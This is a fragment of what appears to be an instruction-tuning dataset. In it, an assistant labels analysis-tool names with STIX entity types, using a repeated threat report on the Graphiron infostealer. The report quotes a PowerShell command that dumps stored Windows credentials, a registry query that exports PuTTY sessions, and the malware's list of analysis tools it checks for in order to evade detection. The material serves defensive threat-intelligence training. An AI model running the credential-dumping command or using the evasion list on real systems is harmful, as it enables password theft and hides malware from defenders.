"input": "### Entity:\nmitmdump\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nrpcapd\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidaq64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nagent.py\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidaq\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\njoeboxcontrol\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nResourceHacker\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
